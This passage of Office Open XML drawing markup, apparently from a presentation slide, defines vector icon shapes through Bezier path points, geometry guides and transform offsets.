                    <a:pt x="170" y="153"/>
                    <a:pt x="157" y="161"/>
                    <a:pt x="144" y="16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42" y="161"/>
                    <a:pt x="29" y="153"/>
                    <a:pt x="26" y="141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14" y="96"/>
                    <a:pt x="14" y="95"/>
                    <a:pt x="14" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="92"/>
                    <a:pt x="0" y="85"/>
                    <a:pt x="0" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="67"/>
                    <a:pt x="8" y="61"/>
                    <a:pt x="16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1"/>
                    <a:pt x="38" y="61"/>
                    <a:pt x="38" y="60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2"/>
                    <a:pt x="78" y="0"/>
                    <a:pt x="83" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="6"/>
                    <a:pt x="90" y="12"/>
                    <a:pt x="87" y="17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132" y="61"/>
                    <a:pt x="132" y="61"/>
                    <a:pt x="132" y="61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5" y="12"/>
                    <a:pt x="107" y="6"/>
                    <a:pt x="112" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="0"/>
                    <a:pt x="123" y="2"/>
                    <a:pt x="126" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="60"/>
                    <a:pt x="156" y="60"/>
                    <a:pt x="156" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="61"/>
                    <a:pt x="156" y="61"/>
                    <a:pt x="157" y="61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90" y="61"/>
                    <a:pt x="197" y="67"/>
                    <a:pt x="197" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="84"/>
                    <a:pt x="192" y="90"/>
                    <a:pt x="186" y="92"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="69" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="98"/>
                    <a:pt x="60" y="98"/>
                    <a:pt x="60" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="94"/>
                    <a:pt x="54" y="91"/>
                    <a:pt x="49" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="93"/>
                    <a:pt x="42" y="98"/>
                    <a:pt x="43" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="137"/>
                    <a:pt x="53" y="137"/>
                    <a:pt x="53" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="141"/>
                    <a:pt x="59" y="144"/>
                    <a:pt x="63" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="141"/>
                    <a:pt x="71" y="137"/>
                    <a:pt x="69" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="107" y="99"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="95"/>
                    <a:pt x="103" y="91"/>
                    <a:pt x="99" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="91"/>
                    <a:pt x="90" y="95"/>
                    <a:pt x="90" y="99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40"/>
                    <a:pt x="94" y="143"/>
                    <a:pt x="99" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="143"/>
                    <a:pt x="107" y="140"/>
                    <a:pt x="107" y="135"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="99"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="135" y="143"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="144"/>
                    <a:pt x="144" y="141"/>
                    <a:pt x="145" y="137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56" y="98"/>
                    <a:pt x="154" y="93"/>
                    <a:pt x="149" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="91"/>
                    <a:pt x="140" y="94"/>
                    <a:pt x="138" y="98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7" y="137"/>
                    <a:pt x="130" y="141"/>
                    <a:pt x="135" y="1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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B600C34E-61E9-4EF1-988F-1752B9337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058153" flipH="1" flipV="1">
              <a:off x="10444224" y="2482855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id="{A4BD700E-E9C5-49AA-BF82-64A519D023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6885" flipH="1" flipV="1">
              <a:off x="1667071" y="-59064"/>
              <a:ext cx="566738" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 9 w 151"/>
                <a:gd name="T1" fmla="*/ 0 h 200"/>
                <a:gd name="T2" fmla="*/ 0 w 151"/>
                <a:gd name="T3" fmla="*/ 191 h 200"/>
                <a:gd name="T4" fmla="*/ 142 w 151"/>
                <a:gd name="T5" fmla="*/ 200 h 200"/>
                <a:gd name="T6" fmla="*/ 151 w 151"/>
                <a:gd name="T7" fmla="*/ 10 h 200"/>
                <a:gd name="T8" fmla="*/ 50 w 151"/>
                <a:gd name="T9" fmla="*/ 161 h 200"/>
                <a:gd name="T10" fmla="*/ 29 w 151"/>
                <a:gd name="T11" fmla="*/ 165 h 200"/>
                <a:gd name="T12" fmla="*/ 24 w 151"/>
                <a:gd name="T13" fmla="*/ 152 h 200"/>
                <a:gd name="T14" fmla="*/ 46 w 151"/>
                <a:gd name="T15" fmla="*/ 148 h 200"/>
                <a:gd name="T16" fmla="*/ 50 w 151"/>
                <a:gd name="T17" fmla="*/ 161 h 200"/>
                <a:gd name="T18" fmla="*/ 46 w 151"/>
                <a:gd name="T19" fmla="*/ 137 h 200"/>
                <a:gd name="T20" fmla="*/ 24 w 151"/>
                <a:gd name="T21" fmla="*/ 133 h 200"/>
                <a:gd name="T22" fmla="*/ 29 w 151"/>
                <a:gd name="T23" fmla="*/ 120 h 200"/>
                <a:gd name="T24" fmla="*/ 50 w 151"/>
                <a:gd name="T25" fmla="*/ 124 h 200"/>
                <a:gd name="T26" fmla="*/ 50 w 151"/>
                <a:gd name="T27" fmla="*/ 105 h 200"/>
                <a:gd name="T28" fmla="*/ 29 w 151"/>
                <a:gd name="T29" fmla="*/ 109 h 200"/>
                <a:gd name="T30" fmla="*/ 24 w 151"/>
                <a:gd name="T31" fmla="*/ 96 h 200"/>
                <a:gd name="T32" fmla="*/ 46 w 151"/>
                <a:gd name="T33" fmla="*/ 92 h 200"/>
                <a:gd name="T34" fmla="*/ 50 w 151"/>
                <a:gd name="T35" fmla="*/ 105 h 200"/>
                <a:gd name="T36" fmla="*/ 83 w 151"/>
                <a:gd name="T37" fmla="*/ 165 h 200"/>
                <a:gd name="T38" fmla="*/ 63 w 151"/>
                <a:gd name="T39" fmla="*/ 161 h 200"/>
                <a:gd name="T40" fmla="*/ 67 w 151"/>
                <a:gd name="T41" fmla="*/ 148 h 200"/>
                <a:gd name="T42" fmla="*/ 88 w 151"/>
                <a:gd name="T43" fmla="*/ 152 h 200"/>
                <a:gd name="T44" fmla="*/ 88 w 151"/>
                <a:gd name="T45" fmla="*/ 133 h 200"/>
                <a:gd name="T46" fmla="*/ 67 w 151"/>
                <a:gd name="T47" fmla="*/ 137 h 200"/>
                <a:gd name="T48" fmla="*/ 63 w 151"/>
                <a:gd name="T49" fmla="*/ 124 h 200"/>
                <a:gd name="T50" fmla="*/ 83 w 151"/>
                <a:gd name="T51" fmla="*/ 120 h 200"/>
                <a:gd name="T52" fmla="*/ 88 w 151"/>
                <a:gd name="T53" fmla="*/ 133 h 200"/>
                <a:gd name="T54" fmla="*/ 83 w 151"/>
                <a:gd name="T55" fmla="*/ 109 h 200"/>
                <a:gd name="T56" fmla="*/ 63 w 151"/>
                <a:gd name="T57" fmla="*/ 105 h 200"/>
                <a:gd name="T58" fmla="*/ 67 w 151"/>
                <a:gd name="T59" fmla="*/ 92 h 200"/>
                <a:gd name="T60" fmla="*/ 88 w 151"/>
                <a:gd name="T61" fmla="*/ 96 h 200"/>
                <a:gd name="T62" fmla="*/ 128 w 151"/>
                <a:gd name="T63" fmla="*/ 161 h 200"/>
                <a:gd name="T64" fmla="*/ 104 w 151"/>
                <a:gd name="T65" fmla="*/ 164 h 200"/>
                <a:gd name="T66" fmla="*/ 99 w 151"/>
                <a:gd name="T67" fmla="*/ 152 h 200"/>
                <a:gd name="T68" fmla="*/ 123 w 151"/>
                <a:gd name="T69" fmla="*/ 148 h 200"/>
                <a:gd name="T70" fmla="*/ 128 w 151"/>
                <a:gd name="T71" fmla="*/ 161 h 200"/>
                <a:gd name="T72" fmla="*/ 123 w 151"/>
                <a:gd name="T73" fmla="*/ 136 h 200"/>
                <a:gd name="T74" fmla="*/ 99 w 151"/>
                <a:gd name="T75" fmla="*/ 133 h 200"/>
                <a:gd name="T76" fmla="*/ 104 w 151"/>
                <a:gd name="T77" fmla="*/ 120 h 200"/>
                <a:gd name="T78" fmla="*/ 128 w 151"/>
                <a:gd name="T79" fmla="*/ 124 h 200"/>
                <a:gd name="T80" fmla="*/ 128 w 151"/>
                <a:gd name="T81" fmla="*/ 105 h 200"/>
                <a:gd name="T82" fmla="*/ 104 w 151"/>
                <a:gd name="T83" fmla="*/ 108 h 200"/>
                <a:gd name="T84" fmla="*/ 99 w 151"/>
                <a:gd name="T85" fmla="*/ 96 h 200"/>
                <a:gd name="T86" fmla="*/ 123 w 151"/>
                <a:gd name="T87" fmla="*/ 92 h 200"/>
                <a:gd name="T88" fmla="*/ 128 w 151"/>
                <a:gd name="T89" fmla="*/ 105 h 200"/>
                <a:gd name="T90" fmla="*/ 103 w 151"/>
                <a:gd name="T91" fmla="*/ 72 h 200"/>
                <a:gd name="T92" fmla="*/ 103 w 151"/>
                <a:gd name="T93" fmla="*/ 56 h 200"/>
                <a:gd name="T94" fmla="*/ 130 w 151"/>
                <a:gd name="T95" fmla="*/ 63 h 200"/>
                <a:gd name="T96" fmla="*/ 136 w 151"/>
                <a:gd name="T97" fmla="*/ 42 h 200"/>
                <a:gd name="T98" fmla="*/ 22 w 151"/>
                <a:gd name="T99" fmla="*/ 48 h 200"/>
                <a:gd name="T100" fmla="*/ 16 w 151"/>
                <a:gd name="T101" fmla="*/ 23 h 200"/>
                <a:gd name="T102" fmla="*/ 129 w 151"/>
                <a:gd name="T103" fmla="*/ 16 h 200"/>
                <a:gd name="T104" fmla="*/ 136 w 151"/>
                <a:gd name="T105" fmla="*/ 42 h 200"/>
                <a:gd name="T106" fmla="*/ 120 w 151"/>
                <a:gd name="T107" fmla="*/ 23 h 200"/>
                <a:gd name="T108" fmla="*/ 124 w 151"/>
                <a:gd name="T109" fmla="*/ 45 h 200"/>
                <a:gd name="T110" fmla="*/ 127 w 151"/>
                <a:gd name="T111" fmla="*/ 2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1" h="200">
                  <a:moveTo>
                    <a:pt x="142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96"/>
                    <a:pt x="4" y="200"/>
                    <a:pt x="9" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="200"/>
                    <a:pt x="142" y="200"/>
                    <a:pt x="142" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="200"/>
                    <a:pt x="151" y="196"/>
                    <a:pt x="151" y="191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1" y="4"/>
                    <a:pt x="147" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="50" y="161"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="163"/>
                    <a:pt x="48" y="165"/>
                    <a:pt x="46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6" y="165"/>
                    <a:pt x="24" y="163"/>
                    <a:pt x="24" y="161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4" y="150"/>
                    <a:pt x="26" y="148"/>
                    <a:pt x="29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8" y="148"/>
                    <a:pt x="50" y="150"/>
                    <a:pt x="50" y="152"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="50" y="161"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="50" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="135"/>
                    <a:pt x="48" y="137"/>
                    <a:pt x="46" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="137"/>
                    <a:pt x="29" y="137"/>
                    <a:pt x="29" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="137"/>
                    <a:pt x="24" y="135"/>
                    <a:pt x="24" y="133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2"/>
                    <a:pt x="26" y="120"/>
                    <a:pt x="29" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="120"/>
                    <a:pt x="46" y="120"/>
                    <a:pt x="46" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="120"/>
                    <a:pt x="50" y="122"/>
                    <a:pt x="50" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="50" y="133"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="50" y="105"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="107"/>
                    <a:pt x="48" y="109"/>
                    <a:pt x="4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6" y="109"/>
                    <a:pt x="24" y="107"/>
                    <a:pt x="24" y="105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4" y="94"/>
                    <a:pt x="26" y="92"/>
                    <a:pt x="29" y="92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48" y="92"/>
                    <a:pt x="50" y="94"/>
                    <a:pt x="50" y="96"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="50" y="105"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="88" y="161"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="163"/>
                    <a:pt x="86" y="165"/>
                    <a:pt x="83" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="165"/>
                    <a:pt x="67" y="165"/>
                    <a:pt x="67" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="165"/>
                    <a:pt x="63" y="163"/>
                    <a:pt x="63" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="152"/>
                    <a:pt x="63" y="152"/>
                    <a:pt x="63" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="150"/>
                    <a:pt x="65" y="148"/>
                    <a:pt x="67" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="148"/>
                    <a:pt x="83" y="148"/>
                    <a:pt x="83" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="148"/>
                    <a:pt x="88" y="150"/>
                    <a:pt x="88" y="152"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88" y="161"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="88" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="135"/>
                    <a:pt x="86" y="137"/>
                    <a:pt x="83" y="137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5" y="137"/>
                    <a:pt x="63" y="135"/>
                    <a:pt x="63" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="124"/>
                    <a:pt x="63" y="124"/>
                    <a:pt x="63" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="122"/>
                    <a:pt x="65" y="120"/>
                    <a:pt x="67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6" y="120"/>
                    <a:pt x="88" y="122"/>
                    <a:pt x="88" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88" y="133"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="88" y="105"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="107"/>
                    <a:pt x="86" y="109"/>
                    <a:pt x="83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5" y="109"/>
                    <a:pt x="63" y="107"/>
                    <a:pt x="63" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="96"/>
                    <a:pt x="63" y="96"/>
                    <a:pt x="63" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="94"/>
                    <a:pt x="65" y="92"/>
                    <a:pt x="67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6" y="92"/>
                    <a:pt x="88" y="94"/>
                    <a:pt x="88" y="96"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88" y="105"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="128" y="161"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="163"/>
                    <a:pt x="125" y="164"/>
                    <a:pt x="123" y="164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2" y="164"/>
                    <a:pt x="99" y="163"/>
                    <a:pt x="99" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="152"/>
                    <a:pt x="99" y="152"/>
                    <a:pt x="99" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="150"/>
                    <a:pt x="102" y="148"/>
                    <a:pt x="10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5" y="148"/>
                    <a:pt x="128" y="150"/>
                    <a:pt x="128" y="152"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="128" y="161"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="128" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="135"/>
                    <a:pt x="125" y="136"/>
                    <a:pt x="123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6"/>
                    <a:pt x="99" y="135"/>
                    <a:pt x="99" y="13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2"/>
                    <a:pt x="102" y="120"/>
                    <a:pt x="104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5" y="120"/>
                    <a:pt x="128" y="122"/>
                    <a:pt x="128" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="128" y="133"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="128" y="105"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="107"/>
                    <a:pt x="125" y="108"/>
                    <a:pt x="12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2" y="108"/>
                    <a:pt x="99" y="107"/>
                    <a:pt x="99" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="96"/>
                    <a:pt x="99" y="96"/>
                    <a:pt x="99" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="94"/>
                    <a:pt x="102" y="92"/>
                    <a:pt x="104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5" y="92"/>
                    <a:pt x="128" y="94"/>
                    <a:pt x="128" y="96"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="128" y="105"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="72"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="72"/>
                    <a:pt x="103" y="72"/>
                    <a:pt x="103" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="72"/>
                    <a:pt x="99" y="67"/>
                    <a:pt x="99" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="60"/>
                    <a:pt x="100" y="56"/>
                    <a:pt x="103" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="56"/>
                    <a:pt x="126" y="56"/>
                    <a:pt x="126" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="56"/>
                    <a:pt x="130" y="60"/>
                    <a:pt x="130" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="67"/>
                    <a:pt x="128" y="72"/>
                    <a:pt x="126" y="72"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136" y="42"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="45"/>
                    <a:pt x="133" y="48"/>
                    <a:pt x="129" y="48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9" y="48"/>
                    <a:pt x="16" y="45"/>
                    <a:pt x="16" y="4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9" y="16"/>
                    <a:pt x="22" y="16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33" y="16"/>
                    <a:pt x="136" y="19"/>
                    <a:pt x="136" y="23"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136" y="42"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="124" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="20"/>
                    <a:pt x="120" y="21"/>
                    <a:pt x="120" y="2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4"/>
                    <a:pt x="122" y="45"/>
                    <a:pt x="124" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="45"/>
                    <a:pt x="127" y="44"/>
                    <a:pt x="127" y="42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1"/>
                    <a:pt x="126" y="20"/>
                    <a:pt x="124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32730723-D46C-4F25-81FE-42740D4890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786341" flipH="1" flipV="1">
              <a:off x="10209714" y="3389815"/>
              <a:ext cx="946467" cy="852618"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 8 w 200"/>
                <a:gd name="T1" fmla="*/ 180 h 180"/>
                <a:gd name="T2" fmla="*/ 8 w 200"/>
                <a:gd name="T3" fmla="*/ 164 h 180"/>
                <a:gd name="T4" fmla="*/ 20 w 200"/>
                <a:gd name="T5" fmla="*/ 100 h 180"/>
                <a:gd name="T6" fmla="*/ 32 w 200"/>
                <a:gd name="T7" fmla="*/ 164 h 180"/>
                <a:gd name="T8" fmla="*/ 80 w 200"/>
                <a:gd name="T9" fmla="*/ 96 h 180"/>
                <a:gd name="T10" fmla="*/ 88 w 200"/>
                <a:gd name="T11" fmla="*/ 164 h 180"/>
                <a:gd name="T12" fmla="*/ 172 w 200"/>
                <a:gd name="T13" fmla="*/ 100 h 180"/>
                <a:gd name="T14" fmla="*/ 184 w 200"/>
                <a:gd name="T15" fmla="*/ 164 h 180"/>
                <a:gd name="T16" fmla="*/ 200 w 200"/>
                <a:gd name="T17" fmla="*/ 172 h 180"/>
                <a:gd name="T18" fmla="*/ 96 w 200"/>
                <a:gd name="T19" fmla="*/ 129 h 180"/>
                <a:gd name="T20" fmla="*/ 129 w 200"/>
                <a:gd name="T21" fmla="*/ 102 h 180"/>
                <a:gd name="T22" fmla="*/ 96 w 200"/>
                <a:gd name="T23" fmla="*/ 129 h 180"/>
                <a:gd name="T24" fmla="*/ 131 w 200"/>
                <a:gd name="T25" fmla="*/ 152 h 180"/>
                <a:gd name="T26" fmla="*/ 158 w 200"/>
                <a:gd name="T27" fmla="*/ 119 h 180"/>
                <a:gd name="T28" fmla="*/ 100 w 200"/>
                <a:gd name="T29" fmla="*/ 149 h 180"/>
                <a:gd name="T30" fmla="*/ 151 w 200"/>
                <a:gd name="T31" fmla="*/ 104 h 180"/>
                <a:gd name="T32" fmla="*/ 100 w 200"/>
                <a:gd name="T33" fmla="*/ 149 h 180"/>
                <a:gd name="T34" fmla="*/ 64 w 200"/>
                <a:gd name="T35" fmla="*/ 102 h 180"/>
                <a:gd name="T36" fmla="*/ 68 w 200"/>
                <a:gd name="T37" fmla="*/ 116 h 180"/>
                <a:gd name="T38" fmla="*/ 71 w 200"/>
                <a:gd name="T39" fmla="*/ 146 h 180"/>
                <a:gd name="T40" fmla="*/ 57 w 200"/>
                <a:gd name="T41" fmla="*/ 146 h 180"/>
                <a:gd name="T42" fmla="*/ 60 w 200"/>
                <a:gd name="T43" fmla="*/ 115 h 180"/>
                <a:gd name="T44" fmla="*/ 181 w 200"/>
                <a:gd name="T45" fmla="*/ 92 h 180"/>
                <a:gd name="T46" fmla="*/ 163 w 200"/>
                <a:gd name="T47" fmla="*/ 76 h 180"/>
                <a:gd name="T48" fmla="*/ 134 w 200"/>
                <a:gd name="T49" fmla="*/ 76 h 180"/>
                <a:gd name="T50" fmla="*/ 116 w 200"/>
                <a:gd name="T51" fmla="*/ 92 h 180"/>
                <a:gd name="T52" fmla="*/ 99 w 200"/>
                <a:gd name="T53" fmla="*/ 76 h 180"/>
                <a:gd name="T54" fmla="*/ 69 w 200"/>
                <a:gd name="T55" fmla="*/ 76 h 180"/>
                <a:gd name="T56" fmla="*/ 51 w 200"/>
                <a:gd name="T57" fmla="*/ 92 h 180"/>
                <a:gd name="T58" fmla="*/ 34 w 200"/>
                <a:gd name="T59" fmla="*/ 76 h 180"/>
                <a:gd name="T60" fmla="*/ 4 w 200"/>
                <a:gd name="T61" fmla="*/ 76 h 180"/>
                <a:gd name="T62" fmla="*/ 4 w 200"/>
                <a:gd name="T63" fmla="*/ 72 h 180"/>
                <a:gd name="T64" fmla="*/ 196 w 200"/>
                <a:gd name="T65" fmla="*/ 76 h 180"/>
                <a:gd name="T66" fmla="*/ 181 w 200"/>
                <a:gd name="T67" fmla="*/ 92 h 180"/>
                <a:gd name="T68" fmla="*/ 177 w 200"/>
                <a:gd name="T69" fmla="*/ 12 h 180"/>
                <a:gd name="T70" fmla="*/ 4 w 200"/>
                <a:gd name="T71" fmla="*/ 68 h 180"/>
                <a:gd name="T72" fmla="*/ 164 w 200"/>
                <a:gd name="T73" fmla="*/ 64 h 180"/>
                <a:gd name="T74" fmla="*/ 160 w 200"/>
                <a:gd name="T75" fmla="*/ 16 h 180"/>
                <a:gd name="T76" fmla="*/ 164 w 200"/>
                <a:gd name="T77" fmla="*/ 64 h 180"/>
                <a:gd name="T78" fmla="*/ 140 w 200"/>
                <a:gd name="T79" fmla="*/ 64 h 180"/>
                <a:gd name="T80" fmla="*/ 124 w 200"/>
                <a:gd name="T81" fmla="*/ 16 h 180"/>
                <a:gd name="T82" fmla="*/ 96 w 200"/>
                <a:gd name="T83" fmla="*/ 64 h 180"/>
                <a:gd name="T84" fmla="*/ 104 w 200"/>
                <a:gd name="T85" fmla="*/ 16 h 180"/>
                <a:gd name="T86" fmla="*/ 96 w 200"/>
                <a:gd name="T87" fmla="*/ 64 h 180"/>
                <a:gd name="T88" fmla="*/ 76 w 200"/>
                <a:gd name="T89" fmla="*/ 16 h 180"/>
                <a:gd name="T90" fmla="*/ 60 w 200"/>
                <a:gd name="T91" fmla="*/ 64 h 180"/>
                <a:gd name="T92" fmla="*/ 36 w 200"/>
                <a:gd name="T93" fmla="*/ 64 h 180"/>
                <a:gd name="T94" fmla="*/ 40 w 200"/>
                <a:gd name="T95" fmla="*/ 16 h 180"/>
                <a:gd name="T96" fmla="*/ 36 w 200"/>
                <a:gd name="T97" fmla="*/ 64 h 180"/>
                <a:gd name="T98" fmla="*/ 180 w 200"/>
                <a:gd name="T99" fmla="*/ 0 h 180"/>
                <a:gd name="T100" fmla="*/ 20 w 200"/>
                <a:gd name="T101" fmla="*/ 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180">
                  <a:moveTo>
                    <a:pt x="192" y="180"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="180"/>
                    <a:pt x="8" y="180"/>
                    <a:pt x="8" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="180"/>
                    <a:pt x="0" y="177"/>
                    <a:pt x="0" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="168"/>
                    <a:pt x="3" y="164"/>
                    <a:pt x="8" y="164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20" y="100"/>
                    <a:pt x="20" y="100"/>
                    <a:pt x="20" y="100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2" y="164"/>
                    <a:pt x="32" y="164"/>
                    <a:pt x="32" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="164"/>
                    <a:pt x="80" y="164"/>
                    <a:pt x="80" y="164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88" y="164"/>
                    <a:pt x="88" y="164"/>
                    <a:pt x="88" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="164"/>
                    <a:pt x="172" y="164"/>
                    <a:pt x="172" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="100"/>
                    <a:pt x="172" y="100"/>
                    <a:pt x="172" y="100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196" y="164"/>
                    <a:pt x="200" y="168"/>
                    <a:pt x="200" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="177"/>
                    <a:pt x="196" y="180"/>
                    <a:pt x="192" y="180"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="96" y="129"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="99"/>
                    <a:pt x="126" y="99"/>
                    <a:pt x="126" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="102"/>
                    <a:pt x="129" y="102"/>
                    <a:pt x="129" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="132"/>
                    <a:pt x="99" y="132"/>
                    <a:pt x="99" y="132"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="161" y="122"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="152"/>
                    <a:pt x="131" y="152"/>
                    <a:pt x="131" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="149"/>
                    <a:pt x="128" y="149"/>
                    <a:pt x="128" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="119"/>
                    <a:pt x="158" y="119"/>
                    <a:pt x="158" y="119"/>
